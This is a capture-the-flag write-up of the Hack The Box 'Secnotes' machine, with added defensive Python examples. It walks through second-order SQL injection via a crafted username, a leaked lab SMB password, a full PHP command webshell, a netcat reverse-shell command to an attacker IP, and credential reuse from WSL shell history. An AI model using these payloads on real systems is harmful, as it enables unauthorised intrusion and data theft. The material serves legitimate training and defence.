This is a write-up for the recently retired Secnotes machine on the Hack The Box platform. If you don’t already know, Hack The Box is a website where you can further your cybersecurity knowledge by hacking into a range of different machines.

TL;DR: SQLi & WSL Escape | I did this box a few months ago, so the commentary on it may be a little rusty. It’s clear that it was popular, since it wasn’t voted out for so long. The main attack vectors in this were SQL Injection through the login field, and then escaping through cleartext passwords in the Windows Subsystem for Linux.

PART ONE: USER

Let’s begin with an nmap scan:

It seems like there are only two services running on this box: HTTP & SMB. We can also see that the webserver is running Microsoft IIS, which is definitely important to note.

Visiting the website shows a login screen, with the option to create an account:

I initially tried some simple logins (such as admin/admin or admin/password) but didn’t get anywhere. So, I decided to create an account with the details user123/password123 and see what’s inside. The basic functionality of the website is as follows:

There are a few important functions to take from this:

We can create/delete notes

We can change our own password

We can contact the owner

My first discovery on here was that we could perform XSS on any of the fields:

Since we have an option to send forms to the owner, I tried crafting a cookie-stealing XSS payload that would capture an administrator's cookie; however, after leaving it for a while, I never received a callback.

I then tried to do some SQLi on the PHPSESSID cookie, and some SQLi on the initial login, but got nowhere through this. Since I’d hit a dead end, I gave up for that evening.

When I came back to the box, I decided to try a method that I had seen whilst reading through a write-up of an older box, Nightmare. In this, SQLi was achieved through creating an account with a username in which the SQL injection took place.

Let's give this a go by creating an account with the username user' OR 1=1#:

With this now created, we can log in and view all the notes!
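To show why a username chosen at registration can break a query that runs much later, here is an added example (not the SecNotes application's code) that models the notes lookup with an in-memory SQLite database: registration is parameterised, the later notes query is string-built, and the same lookup is shown with the username bound as a parameter. The write-up's payload ends in MySQL's # comment; SQLite has no #, so the constructed payload uses -- instead.

```python
import sqlite3

# Constructed stand-in for the notes application's data (not the box's real schema or notes).
NOTES = [
    ("tyler", "new-site share credentials"),
    ("user123", "my note"),
    ("mimi", "Mimi's Sticky Buns"),
]

def setup_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY)")
    db.execute("CREATE TABLE notes (username TEXT, body TEXT)")
    db.executemany("INSERT INTO notes VALUES (?, ?)", NOTES)
    return db

def register(db, username):
    # Registration is parameterised, so the payload is stored verbatim and
    # looks harmless here; it only matters when the stored value is later
    # pasted into another query as text.
    db.execute("INSERT INTO users VALUES (?)", (username,))

def notes_vulnerable(db, username):
    # Second-order injection: the username "came from the database", so it
    # is concatenated into the query without binding.
    query = f"SELECT body FROM notes WHERE username = '{username}'"
    return [body for (body,) in db.execute(query)]

def notes_fixed(db, username):
    # Same lookup with the username bound as a parameter: the quote and the
    # OR clause are matched as literal text, never parsed as SQL.
    rows = db.execute("SELECT body FROM notes WHERE username = ?", (username,))
    return [body for (body,) in rows]

def demo():
    db = setup_db()
    # The write-up's payload is "user' OR 1=1#". "#" is MySQL comment syntax,
    # so this SQLite version uses "-- " to comment out the trailing quote.
    payload = "user' OR 1=1-- "
    register(db, payload)
    return notes_vulnerable(db, payload), notes_fixed(db, payload)
```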

Whilst Mimi’s Sticky Buns and TestNote were useless, the other two were interesting:

It looks like we’ve found some SMB credentials! We can now connect to the server like so:

george@kali:~/htb/secnotes$ smbclient -U tyler \\\\10.10.10.97\\new-site
Enter WORKGROUP\tyler's password: 92g!mA8BGjOirkL%OG*&
Try "help" to get a list of possible commands.
smb: \> pwd
Current directory is \\10.10.10.97\new-site\
smb: \> ls
  .                                   D        0  Sat Sep  8 18:59:16 2018
  ..                                  D        0  Sat Sep  8 18:59:16 2018
  iisstart.htm                        A      696  Thu Jun 21 11:26:03 2018
  iisstart.php                        A       78  Sat Sep  8 18:57:36 2018
  iisstart.png                        A    98757  Thu Jun 21 11:26:03 2018

                12978687 blocks of size 4096. 7860782 blocks available
smb: \>

This is strange — we have some IIS files that we haven’t come across yet. After attempting some further enumeration on this service, I decided to rescan the system to see if our initial nmap scan had missed anything:

Here, we can see a port that didn't appear before: 8808. Attempting to connect to this port reveals that it's running a website:

As such, let’s visit this in the browser:

Since we've now found the default IIS page (iisstart.htm) on port 8808, we can assume that the SMB share we just listed is the web root for this site. We can test this theory by uploading a simple "test.html" page to the share and requesting it:

From here it’s trivial to upload a PHP reverse shell and therefore perform RCE. I used this really short script as my webshell:

<form action="rce.php" method="get">
    <input type="text" name="cmd">
    <input type="submit">
</form>
<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>

With this uploaded, we can now run commands:
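As a defender's counterpart to the webshell above, here is an added example (not code from the write-up) that scans PHP source for command-execution sinks fed from request data. It catches both a superglobal passed straight into the sink and the one-hop pattern used here, where $_REQUEST['cmd'] is first assigned to $cmd. The samples are constructed; the regex approach is deliberately simple and only follows one level of assignment.

```python
import re

# Constructed sample: the one-line webshell from the write-up, as a defender
# would find it sitting in the web root of the share.
SAMPLE_WEBSHELL = """<form action="rce.php" method="get"> <input type="text" name="cmd"> <input type="submit">
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?>"""

# Constructed samples: a direct-use variant and a benign file that calls
# system() with a fixed literal only.
SAMPLE_DIRECT = """<?php passthru($_GET['c']); ?>"""
SAMPLE_BENIGN = """<?php echo system('whoami'); ?>"""

SUPERGLOBALS = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER|FILES)"
SINKS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open", "eval", "assert")

def find_tainted_sinks(php_source):
    """Return (sink, argument) pairs where a dangerous function receives request data."""
    # Pass 1: variables assigned straight from a superglobal, e.g. $cmd = ($_REQUEST['cmd']);
    tainted = {}
    assign_re = r"(\$\w+)\s*=\s*\(?\s*(" + SUPERGLOBALS + r"\[[^\]]*\])\s*\)?\s*;"
    for m in re.finditer(assign_re, php_source):
        tainted[m.group(1)] = m.group(2)

    # Pass 2: sink calls whose argument is a superglobal or a tainted variable.
    findings = []
    sink_re = r"\b(" + "|".join(SINKS) + r")\s*\(\s*([^)]*)\)"
    for m in re.finditer(sink_re, php_source):
        sink, arg = m.group(1), m.group(2).strip()
        if re.search(SUPERGLOBALS, arg):
            findings.append((sink, arg))
            continue
        for var, source in tainted.items():
            if re.search(re.escape(var) + r"\b", arg):
                findings.append((sink, f"{var} <- {source}"))
    return findings
```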

Since we have read access, we can go ahead and read the user flag:

PART TWO: ROOT

It would definitely be far easier to move on from here with a “proper” shell, so we should try to upgrade to that. For this to happen, I first passed nc64.exe into the new-site directory through the SMB client, and then set up a reverse shell. To set up this shell, I entered…

nc64.exe -e cmd.exe 10.10.14.214 4444

…into the webshell, and waited to catch it with netcat:

With a proper shell now in place, we can begin enumerating. Before long, I found a strange folder in the C:\ directory:

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 9CDD-BADA

 Directory of C:\

06/21/2018  03:07 PM    <DIR>          Distros
06/21/2018  06:47 PM    <DIR>          inetpub
06/22/2018  02:09 PM    <DIR>          Microsoft
04/11/2018  04:38 PM    <DIR>          PerfLogs
06/21/2018  08:15 AM    <DIR>          php7
08/19/2018  02:56 PM    <DIR>          Program Files
06/21/2018  06:47 PM    <DIR>          Program Files (x86)
06/21/2018  03:07 PM       201,749,452 Ubuntu.zip
06/21/2018  03:00 PM    <DIR>          Users
08/19/2018  11:15 AM    <DIR>          Windows
09/09/2018  03:25 AM                 0 __output
               2 File(s)    201,749,452 bytes
               9 Dir(s)  32,515,137,536 bytes free

C:\>

It’s strange that we’d have a distros folder in a Windows machine, so it seems like this may be what we’re looking for. In the distros folder, there was one other folder: Ubuntu.

C:\Distros\Ubuntu>dir
 Volume in drive C has no label.
 Volume Serial Number is 9CDD-BADA

 Directory of C:\Distros\Ubuntu

09/09/2018  02:53 AM    <DIR>          .
09/09/2018  02:53 AM    <DIR>          ..
07/11/2017  06:10 PM           190,434 AppxBlockMap.xml
07/11/2017  06:10 PM             2,475 AppxManifest.xml
06/21/2018  03:07 PM    <DIR>          AppxMetadata
07/11/2017  06:11 PM            10,554 AppxSignature.p7x
06/21/2018  03:07 PM    <DIR>          Assets
06/21/2018  03:07 PM    <DIR>          images
07/11/2017  06:10 PM       201,254,783 install.tar.gz
07/11/2017  06:10 PM             4,840 resources.pri
06/21/2018  05:51 PM    <DIR>          temp
07/11/2017  06:10 PM           222,208 ubuntu.exe
07/11/2017  06:10 PM               809 [Content_Types].xml
               7 File(s)    201,686,103 bytes
               6 Dir(s)  32,515,235,840 bytes free

C:\Distros\Ubuntu>

Launching ubuntu.exe just makes the shell hang, and eventually die. I did some research on this folder for a while, and found out that this is part of the WSL (Windows Subsystem for Linux). Since we're looking for ways to get into this, I searched for some other WSL-related files:

Directory of C:\Windows\System32:
    114,688 wsl.exe
Directory of C:\Windows\WinSxS\amd64_microsoft-windows-lxss-wsl_31bf3856ad364e35_10.0.17134.1_none_686f10b5380a84cf:
    114,688 wsl.exe
Directory of C:\Windows\System32:
    115,712 bash.exe
Directory of C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5:
    115,712 bash.exe
Directory of C:\Distros\Ubuntu:
    222,208 ubuntu.exe

I then ran the wsl.exe file, which gave us a shell (the python command simply upgrades us to a TTY shell):

As part of the usual Linux enumeration, I checked the .bash_history file and found the following:

The administrator SMB credentials are there! Let’s copy this command into our own terminal:

And with that, the box is complete!
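The root step above turned on a password left in .bash_history inside the WSL distro. As an added example (not part of the write-up), here is a small audit routine a defender could run over shell history files to flag commands that embed credentials on the command line, reporting the user but redacting the secret. The history sample is constructed and every password in it is a placeholder.

```python
import shlex

# Constructed sample .bash_history (not the box's real file); every secret is a placeholder.
SAMPLE_HISTORY = """cd /mnt/c/Users/Administrator/Desktop
smbclient -U 'administrator%PLACEHOLDER-PASSWORD' //127.0.0.1/c$
mysql -u root -pPLACEHOLDER-DBPASS secnotes
ls -la
curl -u admin:PLACEHOLDER-WEBPASS http://localhost:8808/
"""

def redact(secret):
    # Keep a two-character hint so an admin can recognise which secret leaked.
    return secret[:2] + "*" * max(len(secret) - 2, 0)

def find_history_credentials(history_text):
    """Return (line_no, tool, user, redacted_secret) for commands that embed a password."""
    findings = []
    for n, line in enumerate(history_text.splitlines(), 1):
        try:
            argv = shlex.split(line)
        except ValueError:  # unbalanced quotes: not parseable, skip the line
            continue
        if not argv:
            continue
        tool = argv[0]
        for i, tok in enumerate(argv):
            # smbclient / rpcclient style: -U user%password (also -Uuser%password)
            if tool in ("smbclient", "rpcclient") and tok.startswith("-U"):
                cred = tok[2:] or (argv[i + 1] if i + 1 < len(argv) else "")
                if "%" in cred:
                    user, secret = cred.split("%", 1)
                    findings.append((n, tool, user, redact(secret)))
            # mysql style: password attached directly to -p
            elif tool == "mysql" and tok.startswith("-p") and len(tok) > 2:
                user = argv[argv.index("-u") + 1] if "-u" in argv else "?"
                findings.append((n, tool, user, redact(tok[2:])))
            # curl / wget style: -u user:password
            elif tool in ("curl", "wget") and tok == "-u" and i + 1 < len(argv) and ":" in argv[i + 1]:
                user, secret = argv[i + 1].split(":", 1)
                findings.append((n, tool, user, redact(secret)))
    return findings
```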